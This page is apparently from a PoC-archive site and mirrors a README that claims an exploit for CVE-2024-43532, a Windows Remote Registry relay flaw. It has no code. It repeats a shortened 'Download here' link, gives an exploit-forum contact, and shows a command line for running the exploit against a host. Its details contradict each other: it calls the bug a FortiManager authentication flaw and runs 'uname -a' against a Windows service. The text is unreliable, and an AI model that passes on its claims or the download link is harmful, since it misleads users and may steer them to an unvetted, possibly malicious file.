Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%

CVE-2024-43532 PoC — Remote Registry Service Elevation of Privilege Vulnerability

Source
Associated Vulnerability
Title:Remote Registry Service Elevation of Privilege Vulnerability (CVE-2024-43532)
Description:Remote Registry Service Elevation of Privilege Vulnerability
Readme

# CVE-2024-43532: FortiManager Missing Authentication 

## Overview
CVE-2024-43532
Exploitation of the bug allows the client's NTLM authentication data to be intercepted and redirected to Active Directory Certificate Services (ADCS), which allows hackers to request a user certificate for further authentication to the domain. As a result, new privileged accounts can be created at the domain level, which opens up the possibility of long-term control over the system.

## Exploit:
### [Download here](https://bit.ly/3AFVKRK)

## Details

- **CVE ID**: [CVE-2024-43532](https://nvd.nist.gov/vuln/detail/CVE-2024-43532)
- **Published**: 2024-10-08
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.
- **CVSS**: 8.8

## Vulnerability Description
The problem is related to the BaseBindToMachine function in advapi32.dll. In some cases, the function uses the insecure authentication level RPC_C_AUTHN_LEVEL_CONNECT, which allows attackers to perform a Machine-in-the-Middle attack. If the underlying SMB transport is unavailable, the client switches to TCP/IP and other protocols, which opens the door to interception of data and execution of an attack.


## Affected Versions

**Windows 10/11, Windows Server 2008-2022**

## Running

To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```

## Contact

For inquiries, please contact **hazelook@exploit.in**

## Exploit:
### [Download here](https://bit.ly/3AFVKRK)



File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →